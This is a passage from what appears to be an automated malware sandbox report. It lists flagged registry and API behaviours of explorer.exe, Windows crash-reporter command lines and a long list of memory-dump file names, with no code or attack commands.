    cmdline: explorer.exe
    - Modifies Installed Components in the registry
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
[1] C:\Windows\system32\WerFault.exe
    cmdline: C:\Windows\system32\WerFault.exe -pss -s 184 -p 4020 -ip 4020
[1] C:\Windows\system32\WerFault.exe
    cmdline: C:\Windows\system32\WerFault.exe -u -p 4020 -s 936
    - Program crash
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- memory/220-148-0x0000000000000000-mapping.dmp
- memory/240-147-0x0000000000000000-mapping.dmp
- memory/604-145-0x0000000000000000-mapping.dmp
- memory/608-178-0x0000000000000000-mapping.dmp
- memory/664-143-0x0000000000000000-mapping.dmp
- memory/796-174-0x0000000000000000-mapping.dmp
- memory/860-163-0x0000000000000000-mapping.dmp
- memory/920-179-0x0000000000000000-mapping.dmp
- memory/1032-164-0x0000000000000000-mapping.dmp
- memory/1144-176-0x0000000000000000-mapping.dmp
- memory/1184-162-0x0000000000000000-mapping.dmp
- memory/1248-161-0x0000000000000000-mapping.dmp
- memory/1324-141-0x0000000000000000-mapping.dmp
- memory/1528-135-0x0000000000000000-mapping.dmp
- memory/1600-192-0x0000000000000000-mapping.dmp
- memory/1644-146-0x0000000000000000-mapping.dmp
- memory/1844-152-0x0000000000000000-mapping.dmp
- memory/1912-189-0x0000000000000000-mapping.dmp
- memory/2016-144-0x0000000000000000-mapping.dmp
- memory/2020-177-0x0000000000000000-mapping.dmp
- memory/2044-142-0x0000000000000000-mapping.dmp
- memory/2084-185-0x0000000000000000-mapping.dmp
- memory/2084-133-0x0000000000000000-mapping.dmp
- memory/2156-156-0x0000000000000000-mapping.dmp
- memory/2176-155-0x0000000000000000-mapping.dmp
- memory/2240-171-0x0000000000000000-mapping.dmp
- memory/2356-170-0x0000000000000000-mapping.dmp
- memory/2440-183-0x0000000000000000-mapping.dmp
- memory/2548-186-0x0000000000000000-mapping.dmp
- memory/2584-193-0x0000000000000000-mapping.dmp
- memory/2644-149-0x0000000000000000-mapping.dmp
- memory/2768-165-0x0000000000000000-mapping.dmp
- memory/2784-181-0x0000000000000000-mapping.dmp
- memory/2860-172-0x0000000000000000-mapping.dmp
- memory/3104-160-0x0000000000000000-mapping.dmp
- memory/3428-169-0x0000000000000000-mapping.dmp
- memory/3440-158-0x0000000000000000-mapping.dmp
- memory/3468-173-0x0000000000000000-mapping.dmp
- memory/3588-166-0x0000000000000000-mapping.dmp
- memory/3760-138-0x0000000000000000-mapping.dmp
- memory/3840-153-0x0000000000000000-mapping.dmp
- memory/3932-190-0x0000000000000000-mapping.dmp
- memory/3932-134-0x0000000000000000-mapping.dmp
- memory/4036-182-0x0000000000000000-mapping.dmp
- memory/4072-151-0x0000000000000000-mapping.dmp
- memory/4160-140-0x0000000000000000-mapping.dmp
- memory/4200-132-0x0000000000000000-mapping.dmp
- memory/4240-150-0x0000000000000000-mapping.dmp
- memory/4376-159-0x0000000000000000-mapping.dmp
- memory/4400-168-0x0000000000000000-mapping.dmp
- memory/4460-154-0x0000000000000000-mapping.dmp
- memory/4604-184-0x0000000000000000-mapping.dmp
- memory/4628-195-0x0000000000000000-mapping.dmp
- memory/4644-191-0x0000000000000000-mapping.dmp
- memory/4668-194-0x0000000000000000-mapping.dmp
- memory/4724-137-0x0000000000000000-mapping.dmp
- memory/4744-188-0x0000000000000000-mapping.dmp
- memory/4748-136-0x0000000000000000-mapping.dmp
- memory/4860-180-0x0000000000000000-mapping.dmp
- memory/4876-167-0x0000000000000000-mapping.dmp
- memory/4892-139-0x0000000000000000-mapping.dmp
- memory/4932-187-0x0000000000000000-mapping.dmp
- memory/5072-157-0x0000000000000000-mapping.dmp
- memory/5092-175-0x0000000000000000-mapping.dmp